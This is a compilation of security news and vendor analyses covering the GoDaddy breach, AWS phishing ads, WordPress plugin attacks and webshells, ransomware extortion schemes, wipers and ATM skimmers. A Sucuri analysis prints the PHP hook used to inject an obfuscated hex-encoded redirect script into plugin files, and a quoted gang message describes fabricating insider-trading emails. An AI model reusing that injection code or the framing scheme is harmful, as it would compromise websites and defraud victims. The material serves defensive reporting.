GoDaddy: Hackers stole source code, installed malware in multi-year breach

Web hosting giant GoDaddy says it suffered a breach where unknown attackers have stolen source code and installed malware on its servers after breaching its cPanel shared hosting environment in a multi-year attack.

While GoDaddy discovered the security breach following customer reports in early December 2022 that their sites were being used to redirect to random domains, the attackers had access to the company’s network for multiple years.

“Based on our investigation, we believe these incidents are part of a multi-year campaign by a sophisticated threat actor group that, among other things, installed malware on our systems and obtained pieces of code related to some services within GoDaddy,” the hosting firm said in an SEC filing.

The company says that previous breaches disclosed in November 2021 and March 2020 are also linked to this multi-year campaign.

The November 2021 incident led to a data breach affecting 1.2 million Managed WordPress customers after attackers breached GoDaddy’s WordPress hosting environment using a compromised password.

They gained access to the email addresses of all impacted customers, their WordPress Admin passwords, sFTP and database credentials, and SSL private keys of a subset of active clients.

After the March 2020 breach, GoDaddy alerted 28,000 customers that an attacker used their web hosting account credentials in October 2019 to connect to their hosting account via SSH.

GoDaddy is now working with external cybersecurity forensics experts and law enforcement agencies worldwide as part of an ongoing investigation into the root cause of the breach.

Links to attacks targeting other hosting companies

GoDaddy says it also found additional evidence linking the threat actors to a broader campaign targeting other hosting companies worldwide over the years.

“We have evidence, and law enforcement has confirmed, that this incident was carried out by a sophisticated and organized group targeting hosting services like GoDaddy,” the hosting company said in a statement.

“According to information we have received, their apparent goal is to infect websites and servers with malware for phishing campaigns, malware distribution and other malicious activities.”

GoDaddy is one of the largest domain registrars, and it also provides hosting services to over 20 million customers worldwide.

A GoDaddy spokesperson was not immediately available for comment when contacted by BleepingComputer earlier today.

Source: GoDaddy: Hackers stole source code, installed malware in multi-year breach ( and GoDaddy says a multi-year breach hijacked customer websites and accounts | Ars Technica


Malicious Google ads sneak AWS phishing sites into search results

A new phishing campaign targeting Amazon Web Services (AWS) logins is abusing Google ads to sneak phishing sites into Google Search to steal your login credentials.

The campaign was discovered by Sentinel Labs, whose analysts observed the malicious search results on January 30, 2023. The bad ads ranked second when searching for “aws,” right behind Amazon’s own promoted search result.

Initially, the threat actors linked the ad directly to the phishing page. However, at a later phase, they added a redirection step, likely to evade detection by Google’s ad fraud detection systems.

The malicious Google ads take the victim to a blogger website (“us1-eat-a-w-s.blogspot[.]com”) under the attackers’ control, which is a copy of a legitimate vegan food blog. 

The site uses ‘window.location.replace’ to automatically redirect the victim to a new website that hosts the fake AWS login page, made to appear authentic.

The victim is prompted to select if they are a root or IAM user and then enter their email address and password. This option helps the threat actors categorize the stolen data into two categories of value and utility.

The phishing domains seen by Sentinel Labs are:

  • aws1-console-login[.]us
  • aws2-console-login[.]xyz
  • aws1-ec2-console[.]com
  • aws1-us-west[.]info

An interesting feature of the phishing pages is that their author has included a JavaScript function to disable right clicks, middle mouse buttons, or keyboard shortcuts.

Sentinel Labs says this is likely a mechanism to prevent users from navigating away from the page, either purposefully or by mistake.

The security firm reports seeing Portuguese used as a language in the JavaScript code comments and variables, while the root page of the blogger domain mimics a Brazilian dessert business. Finally, the Whois details used for registering the domains point to a Brazilian person.

Sentinel Labs reported the abuse to CloudFlare, which protected the phishing sites, and the internet company quickly shut down the account. However, the malicious Google Ads remain, even if the sites they link to are no longer online.

Google Ads have been under massive abuse from cybercriminals of all kinds lately, serving as an alternative method to reach potential victims.

These ads have been used lately for phishing password manager accounts, achieving initial network compromise for ransomware deployment, and malware distribution masquerading legitimate software tools.

Last week, Sentinel Labs discovered a campaign that uses virtualization technology together with Google Ads to spread malware that makes it harder to detect by antivirus tools.

Source: Malicious Google ads sneak AWS phishing sites into search results ( and Risky Biz News: Google Search and Ads have a major malware problem (

Multiple Critical Vulnerabilities Fixed In LearnPress Plugin Version <=

If you’re a LearnPress user, please update the plugin to at least version 4.2.0.

The plugin LearnPress (versions and below), which has over 100,000 active installations is a comprehensive WordPress LMS Plugin for WordPress. This is one of the most popular WordPress LMS Plugins which can be used to easily create & sell courses online. We can create a course curriculum with lessons & quizzes included which is managed with an easy-to-use interface for users.

This plugin suffers from multiple critical vulnerabilities. These vulnerabilities allow any unauthenticated users to inject a SQL query to the database and perform local file inclusion. We also found another SQL injection that would need a user with at least “Contributor” role to be exploited. The described vulnerability was fixed in version 4.2.0.

The security vulnerability in LearnPress
Unauthenticated Local File Inclusion (CVE-2022-47615)

The vulnerable code responsible for this vulnerability is located on inc/rest-api/v1/frontend/class-lp-rest-courses-controller.php function list_courses . This function is used to handle API request to lp/v1/courses/archive-course .

Source and more details:

Holiday Attack Spikes Target Ancient Vulnerabilities and Hidden Webshells

Source and more details: WordFence

Winter brings a number of holidays in a short period of time, and many organizations shut down or run a skeleton crew for a week or more at the end of the year and beginning of the new year. This makes it easier for would-be attackers to find success as systems are not as closely monitored. This means that during major holidays it is not uncommon to see spikes in attack attempts.

We observed spikes in attack traffic for two of our firewall rules over the Christmas and New Year holidays, which are discussed in more detail below. The spikes in these rules look rather different when compared to each other. What they have in common is that the best defenses are proactively securing your website and keeping WordPress core, themes, and plugins updated.

Targeted Spikes: Downloads Manager Plugin
There were two spikes specifically targeting the Downloads Manager plugin by Giulio Ganci. The first spike was on December 24, 2022, with a second spike on January 4, 2023. In the 30-day reporting period, only 17 attempts to scan for readme.txt or debug.log files did not target the Downloads Manager plugin. On average, the rule that blocks these scans typically blocks an average of 7,515,876 scan attempts per day. The first spike saw 92,546,995 scan attempts, and the second spike soared to 118,780,958 scan attempts in a single day.

chart of blocked attack attempts targeting the Downloads Manager plugin by day

Over the reporting period, we tracked 466,827 attacking IP addresses. These IP addresses attempted to exploit vulnerabilities on 2,663,905 protected websites. The top 10 IP addresses were responsible for 90,693,836 exploit attempts over the course of the reporting period.

chart of the top ten IP addresses targeting the Downloads Manager plugin

The observed user-agent strings were largely known legitimate user-agents, though some appear to have been modified. The top ten user-agents accounted for 306,845,888 of the total exploit attempts during this time period.

During these spikes, the scans were specifically looking for readme.txt files within the /wp-content/plugins/downloads-manager/ directory of the website. When found, they are primarily attempting to upload the Mister Spy Bot V7 shell with a filename similar to up__jpodv.php, where the last five characters of the name are random letters, or the Saber BOT V1 shell with a filename of saber.php as the malicious payload.

The vulnerability would-be attackers are attempting to exploit is an arbitrary file upload vulnerability found in Downloads Manager <= 0.2. A lack of adequate validation made it possible for files to be uploaded and run on a vulnerable website. This could lead to remote code execution on some sites. The vulnerability was publicly published in 2008, and was never patched. The plugin has since been closed and is no longer available. If this plugin is still being used, it should be removed immediately. Take note that this is not the WordPress Download Manager plugin by W3 Eden, which is still actively being developed and should simply be kept updated with the latest releases as they are published.

Mister Spy Bot V7
The Mister Spy shell returns some basic information about the operating system the website is running on, and the location of the site root on that system, and allows for files to be uploaded. In addition to these features, Mister Spy payloads typically include a reverse shell that allows a successful attacker to obtain additional information about the content management system being used on the website, install additional shells, deface the website, register malicious users on the website, and collect configuration details, among other features.

screenshot of Mister Spy Bot Webshell

Saber BOT V1
Saber BOT gives a successful attacker the ability to view files, and modify their permissions and filenames, as well as edit or delete the files. The current path is displayed in the web interface, and an upload form is provided as well. While not as sophisticated as Mister Spy Bot V7, Saber BOT V1 can still lead to remote code execution due to the file upload capabilities.

Screenshot of Saber BOT webshell

Untargeted Spikes: Known User-Agents
The attack attempts we saw that did not target a specific plugin were blocked due to the use of known malicious user-agent strings. These spikes were not as pronounced as the targeted spikes we saw and occurred on slightly different days. The total number of blocked attacks rose beginning on December 22, 2022, and stayed slightly higher throughout the remainder of the reporting period. Within this time we also saw three spikes on December 23rd and 24th, December 29th, and January 2nd. The January 2, 2023 peak was the largest peak, reaching 183,097,778 blocked attack attempts. This put the peak at nearly three times as many attempts as the average of 66,669,317 blocked per day.

chart of blocked attack attempts by known malicious user-agents by day

The attack attempts blocked by this firewall rule were much more varied, and did not show an increase in specific payloads or intrusion vectors. Instead, the increase appears to have been a simple rise in the volume of attack attempts across all attack types from actors using known malicious user-agents. One of the most common attack types blocked for using a known malicious user-agent string is probing for hidden webshells.

Cyber Observables
The following observables can be used in conjunction with other indicators as an indication that a compromise may have occurred.

The filename for Mister Spy Bot V7 follows a pattern of up__xxxxx.php, where xxxxx is replaced with a random set of five lowercase letters. Saber BOT V1 was consistently named saber.php in these spikes.


Spikes in exploit and other attack attempts are common around holidays, as is highlighted by spikes we observed in probing attempts against the Downloads Manager plugin and blocked known malicious user-agents. These spikes occurred on or near the Christmas and New Year holidays. Fortunately for Wordfence users, firewall rules were already in place to block these attack attempts, even for Wordfence Free users. In addition to having a firewall and malware scanning in place, it is also important to ensure that all components of a website are updated with the latest security releases, and vulnerable plugins with no updates should be removed.

New Linux malware uses 30 plugin exploits to backdoor WordPress sites

A previously unknown Linux malware has been exploiting 30 vulnerabilities in multiple outdated WordPress plugins and themes to inject malicious JavaScript.

According to a report by antivirus vendor Dr. Web, the malware targets both 32-bit and 64-bit Linux systems, giving its operator remote command capabilities.

The main functionality of the trojan is to hack WordPress sites using a set of hardcoded exploits that are run successively, until one of them works.

The targeted plugins and themes are the following:

  • WP Live Chat Support Plugin
  • WordPress – Yuzo Related Posts
  • Yellow Pencil Visual Theme Customizer Plugin
  • Easysmtp
  • WP GDPR Compliance Plugin
  • Newspaper Theme on WordPress Access Control (CVE-2016-10972)
  • Thim Core
  • Google Code Inserter
  • Total Donations Plugin
  • Post Custom Templates Lite
  • WP Quick Booking Manager
  • Faceboor Live Chat by Zotabox
  • Blog Designer WordPress Plugin
  • WordPress Ultimate FAQ (CVE-2019-17232 and CVE-2019-17233)
  • WP-Matomo Integration (WP-Piwik)
  • WordPress ND Shortcodes For Visual Composer
  • WP Live Chat
  • Coming Soon Page and Maintenance Mode
  • Hybrid

If the targeted website runs an outdated and vulnerable version of any of the above, the malware automatically fetches malicious JavaScript from its command and control (C2) server, and injects the script into the website site.

Infected pages act as redirectors to a location of the attacker’s choosing, so the scheme works best on abandoned sites.

These redirections may serve in phishing, malware distribution, and malvertising campaigns to help evade detection and blocking. That said, the operators of the auto-injector might be selling their services to other cybercriminals.

An updated version of the payload that Dr. Web observed in the wild also targets the following WordPress add-ons:

  • Brizy WordPress Plugin
  • FV Flowplayer Video Player
  • WooCommerce
  • WordPress Coming Soon Page
  • WordPress theme OneTone
  • Simple Fields WordPress Plugin
  • WordPress Delucks SEO plugin
  • Poll, Survey, Form & Quiz Maker by OpinionStage
  • Social Metrics Tracker
  • WPeMatico RSS Feed Fetcher
  • Rich Reviews plugin

The new add-ons targeted by the new variant indicate that the development of the backdoor is active at the moment.

Dr. Web also mentions that both variants contain functionality that is currently inactive, which would allow brute-forcing attacks against website administrator accounts.

Defending against this threat requires admins of WordPress websites to update to the latest available version the themes and plugins running on the site and replace those that are no longer developed with alternatives that being supported.

Using strong passwords and activating the two-factor authentication mechanism should help ensure protection against brute-force attacks.


New Ransom Payment Schemes Target Executives, Telemedicine

Ransomware groups are constantly devising new methods for infecting victims and convincing them to pay up, but a couple of strategies tested recently seem especially devious. The first centers on targeting healthcare organizations that offer consultations over the Internet and sending them booby-trapped medical records for the “patient.” The other involves carefully editing email inboxes of public company executives to make it appear that some were involved in insider trading.

Alex Holden is founder of Hold Security, a Milwaukee-based cybersecurity firm. Holden’s team gained visibility into discussions among members of two different ransom groups: CLOP (a.k.a. “Cl0p” a.k.a. “TA505“), and a newer ransom group known as Venus.

Last month, the U.S. Department of Health and Human Services (HHS) warned that Venus ransomware attacks were targeting a number of U.S. healthcare organizations. First spotted in mid-August 2022, Venus is known for hacking into victims’ publicly-exposed Remote Desktop services to encrypt Windows devices.

Holden said the internal discussions among the Venus group members indicate this gang has no problem gaining access to victim organizations.

“The Venus group has problems getting paid,” Holden said. “They are targeting a lot of U.S. companies, but nobody wants to pay them.”

Which might explain why their latest scheme centers on trying to frame executives at public companies for insider trading charges. Venus indicated it recently had success with a method that involves carefully editing one or more email inbox files at a victim firm — to insert messages discussing plans to trade large volumes of the company’s stock based on non-public information.

“We imitate correspondence of the [CEO] with a certain insider who shares financial reports of his companies through which your victim allegedly trades in the stock market, which naturally is a criminal offense and — according to US federal laws [includes the possibility of up to] 20 years in prison,” one Venus member wrote to an underling.

“You need to create this file and inject into the machine(s) like this so that metadata would say that they were created on his computer,” they continued. “One of my clients did it, I don’t know how. In addition to pst, you need to decompose several files into different places, so that metadata says the files are native from a certain date and time rather than created yesterday on an unknown machine.”

Holden said it’s not easy to plant emails into an inbox, but it can be done with Microsoft Outlook .pst files, which the attackers may also have access to if they’d already compromised a victim network.

“It’s not going to be forensically solid, but that’s not what they care about,” he said. “It still has the potential to be a huge scandal — at least for a while — when a victim is being threatened with the publication or release of these records.”

The Venus ransom group’s extortion note. Image:

Holden said the CLOP ransomware gang has a different problem of late: Not enough victims. The intercepted CLOP communication seen by KrebsOnSecurity shows the group bragged about twice having success infiltrating new victims in the healthcare industry by sending them infected files disguised as ultrasound images or other medical documents for a patient seeking a remote consultation.

The CLOP members said one tried-and-true method of infecting healthcare providers involved gathering healthcare insurance and payment data to use in submitting requests for a remote consultation on a patient who has cirrhosis of the liver.

“Basically, they’re counting on doctors or nurses reviewing the patient’s chart and scans just before the appointment,” Holden said. “They initially discussed going in with cardiovascular issues, but decided cirrhosis or fibrosis of the liver would be more likely to be diagnosable remotely from existing test results and scans.”

While CLOP as a money making collective is a fairly young organization, security experts say CLOP members hail from a group of Threat Actors (TA) known as “TA505,” which MITRE’s ATT&CK database says is a financially motivated cybercrime group that has been active since at least 2014. “This group is known for frequently changing malware and driving global trends in criminal malware distribution,” MITRE assessed.

In April, 2021, KrebsOnSecurity detailed how CLOP helped pioneer another innovation aimed at pushing more victims into paying an extortion demand: Emailing the ransomware victim’s customers and partners directly and warning that their data would be leaked to the dark web unless they can convince the victim firm to pay up.

Security firm Tripwire points out that the HHS advisory on Venus says multiple threat actor groups are likely distributing the Venus ransomware. Tripwire’s tips for all organizations on avoiding ransomware attacks include:

  • Making secure offsite backups.
  • Running up-to-date security solutions and ensuring that your computers are protected with the latest security patches against vulnerabilities.
  • Using hard-to-crack unique passwords to protect sensitive data and accounts, as well as enabling multi-factor authentication.
  • Encrypting sensitive data wherever possible.
  • Continuously educating and informing staff about the risks and methods used by cybercriminals to launch attacks and steal data.

While the above tips are important and useful, one critical area of ransomware preparedness overlooked by too many organizations is the need to develop — and then periodically rehearse — a plan for how everyone in the organization should respond in the event of a ransomware or data ransom incident. Drilling this breach response plan is key because it helps expose weaknesses in those plans that could be exploited by the intruders.

As noted in last year’s story Don’t Wanna Pay Ransom Gangs? Test Your Backups, experts say the biggest reason ransomware targets and/or their insurance providers still pay when they already have reliable backups of their systems and data is that nobody at the victim organization bothered to test in advance how long this data restoration process might take.

“Suddenly the victim notices they have a couple of petabytes of data to restore over the Internet, and they realize that even with their fast connections it’s going to take three months to download all these backup files,” said Fabian Wosar, chief technology officer at Emsisoft. “A lot of IT teams never actually make even a back-of-the-napkin calculation of how long it would take them to restore from a data rate perspective.”


Infected WordPress Plugins Redirect to Push Notification Scam

Attackers are always finding unique ways to avoid detection. Our teams regularly find malware on compromised websites which have been obfuscated to make it more difficult for webmasters to detect or understand. Obfuscation can take many forms, such as encrypting code or using complex algorithms to hide the true nature of the malicious contents. For example, many malware samples we detect are encoded into base64 to confuse website owners and evade detection.

But during a recent investigation, I stumbled across a rather interesting piece of malware using a more complex form of obfuscation. Instead of leveraging the typical base64 encoding to evade detection, the attacker was adding variations of a PHP function to normal plugin files which decoded hex2dec from a second file containing a hexadecimal payload.

Let’s take a closer look.

Unwanted redirects to fake captcha scam

A new client was complaining that whenever a site visitor clicked anywhere on their website, a browser tab was opened which redirected the victim to the following spammy web page: hxxps://1.guesswhatnews[.]com/not-a-robot/index.html

Redirect to push notification scam with fake captcha
Fake captcha displayed to redirected website visitors.

The spam website was resolving to an IP address employed by a shady ad network mainly used for porn websites.

An inspection of the compromised web page revealed a malicious JavaScript injection as the source of the redirect, which had been injected into random plugin files on the compromised website.

Malicious JavaScript injected into WordPress plugins via _inc.tmp

As it turns out, our remediation teams have recently noticed an influx of tickets for WordPress websites that have the following code injected into random plugins:

if ((is_admin() || (function_exists('get_hex_cache'))) !== true) {
        add_action('wp_head', 'get_hex_cache', 12);

        function get_hex_cache()
            return print(@hex2bin( '3c7' . (file_get_contents(__DIR__  .'/_inc.tmp'))));

This PHP code injects the decoded contents of _inc.tmp (found in the same plugin directory) into the header section of the site’s WordPress pages.

To accomplish this, it adds the get_hex_cache function to the wp_head hook. This hook is only added once, even when more than one plugin is infected. It’s also worth noting that the malware is not activated for site administrators.

The _inc.tmp file contains a 51Kb-long sequence of digits:

The _inc.tmp file containing 51Kb-long sequence of digits:

It’s a hexadecimally encoded binary string. The malware appends 3c7 at the beginning of the string and decodes using the hex2bin PHP function.

The decoded results contain a <script> tag populated with obfuscated JavaScript code, which is injected into WordPress pages.

Example of the injected malicious JavaScript
Example of the injected script

The code begins with “function _0x18b4(){const _0x188f70=”. And yet another interesting feature of this injection is the data-group=”lists” parameter of the script tag. A quick check with PublicWWW revealed over 170 websites infected with this particular piece of malware (at the time of writing).

Furthermore, the script adds a listener to the whole page’s onclick event. Whenever a site visitor clicks on any link, it changes the link to hxxps://1.guesswhatnews[.]com/not-a-robot/index.html?var=siteid&ymid=clickid&rc=0&mrc=3&fsc=0&zoneid=1947429&tbz=1947431

Evading detection from dev tools

To hide the malicious activity from prying eyes, the script doesn’t do anything if it detects open Developer Tools. We’ve seen this behavior quite often in MageCart malware, however this script uses a more complex approach to detecting dev tools which relies on multiple alternative methods.

Here is a list of some of the function names this malware uses to make these checks:

  • checkByImageMethod
  • checkDevByScreenResize
  • detectDevByKeyboard
  • checkByFirebugMethod
  • checkByProfileMethod
Malware detects developer tools

Whenever the malware detects that dev tools are enabled, then the redirect doesn’t occur and malicious behavior is much harder to find upon inspection.

Mitigation Steps

Obfuscation can make it challenging for website owners to detect or pinpoint the source of malicious behavior on their website. Fortunately, a number of free and paid tools exist to help monitor for indicators of compromise.

Let’s take a look at some of the ways you can mitigate risk of infection for your website.

  • Scan your website for malware regularly and keep an eye out for infections at both the client and server level.
  • Install the latest software updates and patches for your website as soon as they become available. That includes core CMS, plugins, themes, and other extensible components.
  • Leverage a web application firewall to virtually patch known vulnerabilities, block bad bots, and mitigate brute force attacks.
  • Harden your website by restricting access to admin pages and using strong, unique passwords for all of your website’s accounts.
  • Use file integrity monitoring to detect any unexpected changes in your environment.


This broken ransomware can’t decrypt your files, even if you pay the ransom

Researchers warn this badly built ransomware will destroy your files, so don’t pay up.

Victims of a recently uncovered form of ransomware are being warned not to pay the ransom demand, simply because the ransomware isn’t able to decrypt files – it just destroys them instead. 

Coded in Python, Cryptonite ransomware first appeared in October as part of a free-to-download open-source toolkit – available to anyone with the skills required to deploy it in attacks against Microsoft Windows systems, with phishing attacks believed to be the most common means of delivery.

But analysis of Cryptonite by cybersecurity researchers at Fortinet has found that the ransomware only has “barebones” functionality and doesn’t offer a means of decrypting files at all, even if a ransom payment is made. 

Instead, Cryptonite effectively acts as wiper malware, destroying the encrypted files, leaving no way of retrieving the data. 

But rather than this being an intentionally malicious act of destruction by design, researchers suggest that the reason Cryptonite does this is because the ransomware has been poorly put together.  

A basic design and what’s described as a “lack of quality assurance” means the ransomware doesn’t work correctly because a flaw in the way it’s been put together means if Cryptonite crashes or is just closed, it leaves no way to recover encrypted files. 

There’s also no way to run it in decryption-only mode – so every time the ransomware is run, it re-encrypts everything with a different key. This means that, even if there was a way to recover the files, the unique key probably wouldn’t work – leaving no way to recover the encrypted data. 

“This sample demonstrates how a ransomware’s weak architecture and programming can quickly turn it into a wiper that does not allow data recovery,” said Gergely Révay, security researcher at Fortinet’s FortiGuard Labs. 

“Although we often complain about the increasing sophistication of ransomware samples, we can also see that oversimplicity and a lack of quality assurance can also lead to significant problems,” he added. 

It’s the victim of the ransomware attack that feels those problems, as they’re left with no means of restoring their network – even if they’ve made a ransom payment.  

The case of Cryptonite ransomware also serves as a reminder that paying a ransom is never a guarantee that the cyber criminals will provide a decryption key, or if it will work properly.   

Cyber agencies, including CISA, the FBI and the NCSC, recommend against paying the ransom because it only serves to embolden and encourage cyber criminals, particularly if they can acquire ransomware at a low cost or for free. 

The slightly good news is that it’s now harder for wannabe cyber criminals to get their hands on Cryptonite, as the original source code has been removed from GitHub. 

In addition to this, the simple nature of the ransomware also means that it’s easy for antivirus software to detect – so it’s recommended antivirus software is installed and kept up to date. 


Never-before-seen malware is nuking data in Russia’s courts and mayors’ offices

CryWiper masquerades as ransomware, but its real purpose is to permanently destroy data.

Mayors’ offices and courts in Russia are under attack by never-before-seen malware that poses as ransomware but is actually a wiper that permanently destroys data on an infected system, according to security company Kaspersky and the Izvestia news service.

Kaspersky researchers have named the wiper CryWiper, a nod to the extension .cry that gets appended to destroyed files. Kaspersky says its team has seen the malware launch “pinpoint attacks” on targets in Russia. Izvestia, meanwhile, reported that the targets are Russian mayors’ offices and courts. Additional details, including how many organizations have been hit and whether the malware successfully wiped data, weren’t immediately known.

Wiper malware has grown increasingly common over the past decade. In 2012, a wiper known as Shamoon wreaked havoc on Saudi Arabia’s Saudi Aramco and Qatar’s RasGas. Four years later, a new variant of Shamoon returned and struck multiple organizations in Saudi Arabia. In 2017, self-replicating malware dubbed NotPetya spread across the globe in a matter of hours and caused an estimated $10 billion in damage. In the past year, a flurry of new wipers appeared. They include DoubleZero, IsaacWiper, HermeticWiper, CaddyWiper, WhisperGate, AcidRain, Industroyer2, and RuRansom.

Kaspersky said it discovered the attack attempts by CryWiper in the last few months. After infecting a target, the malware left a note demanding, according to Izvestia, 0.5 bitcoin and including a wallet address where the payment could be made.

“After examining a sample of malware, we found out that this Trojan, although it masquerades as a ransomware and extorts money from the victim for ‘decrypting’ data, does not actually encrypt, but purposefully destroys data in the affected system,” Kaspersky’s report stated. “Moreover, an analysis of the Trojan’s program code showed that this was not a developer’s mistake, but his original intention.”Advertisement

Source and more details: Never-before-seen malware is nuking data in Russia’s courts and mayors’ offices | Ars Technica

Say Hello to Crazy Thin ‘Deep Insert’ ATM Skimmers

A number of financial institutions in and around New York City are dealing with a rash of super-thin “deep insert” skimming devices designed to fit inside the mouth of an ATM’s card acceptance slot. The card skimmers are paired with tiny pinhole cameras that are cleverly disguised as part of the cash machine. Here’s a look at some of the more sophisticated deep insert skimmer technology that fraud investigators have recently found in the wild.

This ultra thin and flexible “deep insert” skimmer recently recovered from an NCR cash machine in New York is about half the height of a U.S. dime. The large yellow rectangle is a battery. Image:

The insert skimmer pictured above is approximately .68 millimeters tall. This leaves more than enough space to accommodate most payment cards (~.54 mm) without interrupting the machine’s ability to grab and return the customer’s card. For comparison, this flexible skimmer is about half the height of a U.S. dime (1.35 mm).

These skimmers do not attempt to siphon chip-card data or transactions, but rather are after the cardholder data still stored in plain text on the magnetic stripe on the back of most payment cards issued to Americans.

Here’s what the other side of that insert skimmer looks like:

The other side of the deep insert skimmer. Image:

The thieves who designed this skimmer were after the magnetic stripe data and the customer’s 4-digit personal identification number (PIN). With those two pieces of data, the crooks can then clone payment cards and use them to siphon money from victim accounts at other ATMs.

To steal PINs, the fraudsters in this case embedded pinhole cameras in a false panel made to fit snugly over the cash machine enclosure on one side of the PIN pad.

Pinhole cameras were hidden in these false side panels glued to one side of the ATM, and angled toward the PIN pad. Image:

The skimming devices pictured above were pulled from a brand of ATMs made by NCR called the NCR SelfServ 84 Walk-Up. In January 2022, NCR produced a report on motorized deep insert skimmers, which offers a closer look at other insert skimmers found targeting this same line of ATMs.

Here are some variations on deep insert skimmers NCR found in recent investigations:

Image: NCR.

Image: NCR

The NCR report included additional photos that show how fake ATM side panels with the hidden cameras are carefully crafted to slip over top of the real ATM side panels.

Image: NCR.

Sometimes the skimmer thieves embed their pinhole spy cameras in fake panels directly above the PIN pad, as in these recent attacks targeting a similar NCR model:

Image: NCR

In the image below, the thieves hid their pinhole camera in a “consumer awareness mirror” placed directly above an ATM retrofitted with an insert skimmer:

Image: NCR

The financial institution that shared the images above said it has seen success in stopping most of these insert skimmer attacks by incorporating a solution that NCR sells called an “insert kit,” which it said stops current insert skimmer designs. NCR also is conducting field trials on a “smart detect kit” that adds a standard USB camera to view the internal card reader area, and uses image recognition software to identify any fraudulent device inside the reader.

Skimming devices will continue to mature in miniaturization and stealth as long as payment cards continue to hold cardholder data in plain text on a magnetic stripe. It may seem silly that we’ve spent years rolling out more tamper- and clone-proof chip-based payment cards, only to undermine this advance in the name of backwards compatibility. However, there are a great many smaller businesses in the United States that still rely on being able to swipe the customer’s card.

Many newer ATM models, including the NCR SelfServ referenced throughout this post, now include contactless capability, meaning customers no longer need to insert their ATM card anywhere: They can instead just tap their smart card against the wireless indicator to the left of the card acceptance slot (and right below the “Use Mobile Device Here” sign on the ATM).

For simple ease-of-use reasons, this contactless feature is now increasingly prevalent at drive-thru ATMs. If your payment card supports contactless technology, you will notice a wireless signal icon printed somewhere on the card — most likely on the back. ATMs with contactless capabilities also feature this same wireless icon.

Once you become aware of ATM skimmers, it’s difficult to use a cash machine without also tugging on parts of it to make sure nothing comes off. But the truth is you probably have a better chance of getting physically mugged after withdrawing cash than you do encountering a skimmer in real life.

So keep your wits about you when you’re at the ATM, and avoid dodgy-looking and standalone cash machines in low-lit areas, if possible. When possible, stick to ATMs that are physically installed at a bank. And be especially vigilant when withdrawing cash on the weekends; thieves tend to install skimming devices on Saturdays after business hours — when they know the bank won’t be open again for more than 24 hours.

Lastly but most importantlycovering the PIN pad with your hand defeats one key component of most skimmer scams: The spy camera that thieves typically hide somewhere on or near the compromised ATM to capture customers entering their PINs.

Shockingly, few people bother to take this simple, effective step. Or at least, that’s what KrebsOnSecurity found in this skimmer tale from 2012, wherein we obtained hours worth of video seized from two ATM skimming operations and saw customer after customer walk up, insert their cards and punch in their digits — all in the clear.